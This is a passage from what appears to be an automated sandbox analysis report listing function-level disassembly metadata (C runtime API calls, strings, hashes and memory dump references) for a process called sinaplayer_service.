                                                                                                                                                                                                    • Instruction ID: 4be8a0439b7a102f0fc6c7ba61c920fbae08dd3a009757b7b4647e2677460c31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e566df18b961f91470cee0b25dab0b6095d2365e9b31ee8397a7f1f73698cb47
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6411EB05046889FDB31CE69CC54BEB7BFD9F46308F1408EDD58996546E2319A86CF21
                                                                                                                                                                                                    Function 00374E40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00374F50,?,?,?,?,?,?,003722E9,?,?,00000000), ref: 00374E5A
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,00374F50,?,?,?,?,?,?,003722E9,?,?,00000000), ref: 00374E7E
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,00000000,?,00000000,?,?,?,?,00374F50,?,?,?,?,?), ref: 00374EC3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 4248180022-4289949731
                                                                                                                                                                                                    • Opcode ID: da7bc0303868b3815288752ec287da8cc43252715d64dcd22f3c2f970a75edcb
                                                                                                                                                                                                    • Instruction ID: 4436387f06f1291cb2d609f1eabe5009c67f00d85a688181494df28520f6036f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: da7bc0303868b3815288752ec287da8cc43252715d64dcd22f3c2f970a75edcb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F121CF313102199FCB35CF68E8C496AB7A9FF84765700853EE949CBA90DB31F815CBA4
                                                                                                                                                                                                    Function 6C582C60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcspbrk.LIBCMT(00EC4446,6C582CB8,?,6C631218,6C582DD4), ref: 6C582C85
                                                                                                                                                                                                    • _wmatch.LIBCMT ref: 6C5A3E9F
                                                                                                                                                                                                      • Part of subcall function 6C582C27: _malloc_crt.MSVCR120(00000008,?,6C5CC85C,00000000,00000000,00000000,00000001,00000000), ref: 6C582C2C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _malloc_crt_wcspbrk_wmatch
                                                                                                                                                                                                    • String ID: HD
                                                                                                                                                                                                    • API String ID: 2060052928-3471098148
                                                                                                                                                                                                    • Opcode ID: a7e0ae7fd672009e811c4f8c1f45700b66a647cb9f4694c24928fcf7dca97ad6
                                                                                                                                                                                                    • Instruction ID: ce08943b6df6bb2021793ae7dc7af297c028ec7aaa7c5e79e1e795ab01b4e82c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7e0ae7fd672009e811c4f8c1f45700b66a647cb9f4694c24928fcf7dca97ad6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A121CF76B07632DBEB218F1BDD44922BBF8EF56728324062AD855D7B50DB30DC428B84
                                                                                                                                                                                                    Function 00390650 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: fscanf_s$fgets
                                                                                                                                                                                                    • String ID: %d$GBP1
                                                                                                                                                                                                    • API String ID: 1025516267-3547967902
                                                                                                                                                                                                    • Opcode ID: 1d60e86858b6c7aba950a488a053f938eb611e529d3d84258a3754c54bcf0ab9
                                                                                                                                                                                                    • Instruction ID: 10052fda75f85ef4e91263fb8cf192585b89c51dcb8cff9d9485c6996ab22e37
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d60e86858b6c7aba950a488a053f938eb611e529d3d84258a3754c54bcf0ab9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77216D715001085FCF369F289C827BB7B68EF11314F55019AED89D7282DB339D58CB91
                                                                                                                                                                                                    Function 00374730 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,?,?,?,003747A0,00000001,?,?,?,00372D7F,-00000002,?), ref: 00374764
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000001,?,?,?,003747A0,00000001,?,?,?,00372D7F,-00000002,?), ref: 0037476B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 373104503-3788999226
                                                                                                                                                                                                    • Opcode ID: a25ef0043a4c6dfe076732c69720be325c96cf14cb5d26abac88a9115fa76409
                                                                                                                                                                                                    • Instruction ID: 9014b6de120fb3feee6771122e1b9323fc323bfc1d97bb131185fdc005bbc45a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a25ef0043a4c6dfe076732c69720be325c96cf14cb5d26abac88a9115fa76409
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4211E5B21006146BC7219F99E881A97F7ECEF96320F00802BEA6DC7240E775F441CBA0
                                                                                                                                                                                                    Function 6C566EDE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __output_l.LIBCMT ref: 6C566F2A
                                                                                                                                                                                                      • Part of subcall function 6C566C0F: _errno.MSVCR120(?,?,?,00000000), ref: 6C566C84
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A59E6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A59F1
                                                                                                                                                                                                    • _flsbuf.MSVCR120(00000000,?), ref: 6C5A5A03
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__output_l_flsbuf_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 531506805-1255198513
                                                                                                                                                                                                    • Opcode ID: ff60e6265110582dff214c53019b6cac8ee69f181b0041a41a1a6057d0b1586c
                                                                                                                                                                                                    • Instruction ID: e1cf28fd3e63b4c6378d145667fe75a1e55aa06e69d25a169f59ac9a77f95bc8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff60e6265110582dff214c53019b6cac8ee69f181b0041a41a1a6057d0b1586c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1201A57190420DDFDB009EA9DC409EEB7B8FB08328F10026AE924E6690EB359905CBA4
                                                                                                                                                                                                    Function 0037FD24 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(00000003), ref: 0037FD27
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FD5C
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FD69
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@Append@Get@PathPath@base@@@Service@@U?$char_traits@_V01@V01@@V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@
                                                                                                                                                                                                    • String ID: player_resources.pak
                                                                                                                                                                                                    • API String ID: 1085834238-1294963580
                                                                                                                                                                                                    • Opcode ID: 0a0708c5ec326743e535240693e426d0e0a5526542ede0f212d547f28ce7f9c4
                                                                                                                                                                                                    • Instruction ID: 22d981049fbe5fcc9edbb1d896ffc11f89fba05d0bf27821bf07df543a19284c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a0708c5ec326743e535240693e426d0e0a5526542ede0f212d547f28ce7f9c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001D231908218CEDF66EB64C8197DDBB78EF15314F0001DAD40E67280CF341B48CB10
                                                                                                                                                                                                    Function 0037FEB7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(00000003), ref: 0037FEBA
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FEEF
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FEFC
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@Append@Get@PathPath@base@@@Service@@U?$char_traits@_V01@V01@@V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@
                                                                                                                                                                                                    • String ID: sinaclient.dll
                                                                                                                                                                                                    • API String ID: 1085834238-3029616156
                                                                                                                                                                                                    • Opcode ID: 464d1e481c4d76c05a4b9585e533f879b2b983688198d449c97f019a13bdafff
                                                                                                                                                                                                    • Instruction ID: 4b92a31a402abe6d88876f57cf75d34ee8930ddaa0d4a4f97c2e9ea5b1c7c870
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 464d1e481c4d76c05a4b9585e533f879b2b983688198d449c97f019a13bdafff
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D501F131A0421C9EDF26EBA4DC597DDBBB8FF16314F0000DAD44AA7281CB711A48CF61
                                                                                                                                                                                                    Function 00390F80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand$swprintf_s
                                                                                                                                                                                                    • String ID: %s%08X%08X$---------------------------
                                                                                                                                                                                                    • API String ID: 2316684710-1747277357
                                                                                                                                                                                                    • Opcode ID: 168e1f9deee02f32614e0a0e7d1c305c95179124a6993b2f35d5f7b927138b57
                                                                                                                                                                                                    • Instruction ID: ac3242b999a3e7ae4282628f47ebf28dfaacff326474d94e30def0702871360b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 168e1f9deee02f32614e0a0e7d1c305c95179124a6993b2f35d5f7b927138b57
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2F06D75B00308ABCB01EFF8DC8A9AEB7BCEB48711F40056AE809DB240EA7599048751
                                                                                                                                                                                                    Function 6C5CAE0D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6C5CAE28
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6C5CAE60
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(Lu[lpx[l,Function_000DCEE8,?), ref: 6C5CAE75
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@ExceptionThrowstd::exception::exception
                                                                                                                                                                                                    • String ID: Lu[lpx[l$pScheduler
                                                                                                                                                                                                    • API String ID: 4282526312-3306990351
                                                                                                                                                                                                    • Opcode ID: 0afbc5a786c5916acf07c1e7f1c82be85925aacc375379fe2a30fbed0a6c269e
                                                                                                                                                                                                    • Instruction ID: 069480344781210ba664fe8b1703c09e4a5fda8cad140c223d0c66093bc797f9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0afbc5a786c5916acf07c1e7f1c82be85925aacc375379fe2a30fbed0a6c269e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDF0C235A01208EBCB14EF94CC919EE7BB8AF44244710856DE816A7E60CB30AA49CFD5
                                                                                                                                                                                                    Function 00394C80 Relevance: 7.7, APIs: 6, Instructions: 214COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?,?,00000000,00000000,?,?,003949B4,00000000,00000000,?,00000000,?,0039400F,?), ref: 00394CBF
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?,00000000,00000000,?,?,?,?,003849C2,?,00000000,00000000,00000000,?,6C6C52C0), ref: 00394D4A
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00394D5E
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,?,?,00000000,00000000,?,?,003949B4,00000000,00000000,?,00000000,?,0039400F,?), ref: 00394DDB
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00394E86
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00394EC2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                                                                    • Opcode ID: 15ebe4e60604247c027e69c8762a224df50e9fd92213bdd4198c0d0d7957ba69
                                                                                                                                                                                                    • Instruction ID: b1879d0cc1e8a2df038daba5ee54455d532b0eae97cf0fd9a6e8bfd5f7163c41
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15ebe4e60604247c027e69c8762a224df50e9fd92213bdd4198c0d0d7957ba69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A819071610A009FDF25CF29C885EA6B7E6FF84308F24856DE98ACB655E731F941CB44
                                                                                                                                                                                                    Function 6C5BA94B Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BA974
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BA994
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BAA46
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BAAA6
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BAAAF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2717317152-0
                                                                                                                                                                                                    • Opcode ID: 4e7ca5e0138b25afbda86750dcd9407cbb7e04a3b5bb751fa6837829e94b8737
                                                                                                                                                                                                    • Instruction ID: e799679d5faec003e36b12ef83d37974ce95ce47e4111160f0b812ab21dc2950
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e7ca5e0138b25afbda86750dcd9407cbb7e04a3b5bb751fa6837829e94b8737
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F5136B5A0061AAFCB04CFA9C99199DFBB5FF48354B10816AE819EB740D730AE51CB90
                                                                                                                                                                                                    Function 6C5D4F8E Relevance: 7.6, APIs: 5, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6C5D5128,00000008), ref: 6C5D4FA8
                                                                                                                                                                                                    • _errno.MSVCR120(6C5D5128,00000008), ref: 6C5D4FC0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C5D5128,00000008), ref: 6C5D5118
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4106058386-0
                                                                                                                                                                                                    • Opcode ID: 61c2a7d8ea5db4026962fd918acd7fc8c3ca380086def245ce6fe3cfc5c8cf0b
                                                                                                                                                                                                    • Instruction ID: 2686533de4908cf6b182b8eefd40571467ab188b4cc1e72f5c9bd285c27a53dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61c2a7d8ea5db4026962fd918acd7fc8c3ca380086def245ce6fe3cfc5c8cf0b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B34118F15963128AD711CF7E8C4075937A0DB823A8F9B8A25D463CBED0E774E8804BD9
                                                                                                                                                                                                    Function 00385D10 Relevance: 7.6, APIs: 5, Instructions: 103fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
